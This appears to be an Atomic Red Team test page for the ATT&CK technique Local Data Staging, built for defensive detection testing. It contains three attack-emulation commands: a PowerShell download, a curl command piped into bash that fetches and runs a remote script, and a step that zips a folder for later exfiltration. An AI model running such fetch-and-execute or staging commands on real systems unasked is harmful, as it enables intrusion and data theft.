T1074.001.md

T1074.001 - Local Data Staging

Description from ATT&CK

Adversaries may stage collected data in a central location or directory on the local system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.

Atomic Tests

• Atomic Test #1 - Stage data from Discovery.bat

• Atomic Test #2 - Stage data from Discovery.sh

• Atomic Test #3 - Zip a Folder with PowerShell for Staging in Temp

Atomic Test #1 - Stage data from Discovery.bat

Utilize powershell to download discovery.bat and save to a local file. This emulates an attacker downloading data collection tools onto the host. Upon execution, verify that the file is saved in the temp directory.

Supported Platforms: Windows

Inputs:

Name	Description	Type	Default Value
output_file	Location to save downloaded discovery.bat file	Path	$env:TEMP\discovery.bat

Attack Commands: Run with powershell!

Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.bat" -OutFile #{output_file}

Cleanup Commands:

Remove-Item -Force #{output_file} -ErrorAction Ignore

Atomic Test #2 - Stage data from Discovery.sh

Utilize curl to download discovery.sh and execute a basic information gathering shell script

Supported Platforms: Linux, macOS

Inputs:

Name	Description	Type	Default Value
output_file	Location to save downloaded discovery.bat file	Path	/tmp/T1074.001_discovery.log

Attack Commands: Run with bash!

curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.sh | bash -s > #{output_file}

Atomic Test #3 - Zip a Folder with PowerShell for Staging in Temp

Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration. Upon execution, Verify that a zipped folder named Folder_to_zip.zip was placed in the temp directory.

Supported Platforms: Windows

Inputs:

Name	Description	Type	Default Value
output_file	Location to save zipped file or folder	Path	$env:TEMP\Folder_to_zip.zip
input_file	Location of file or folder to zip	Path	PathToAtomicsFolder\T1074.001\bin\Folder_to_zip

Attack Commands: Run with powershell!

Compress-Archive -Path #{input_file} -DestinationPath #{output_file} -Force

Cleanup Commands:

Remove-Item -Path #{output_file} -ErrorAction Ignore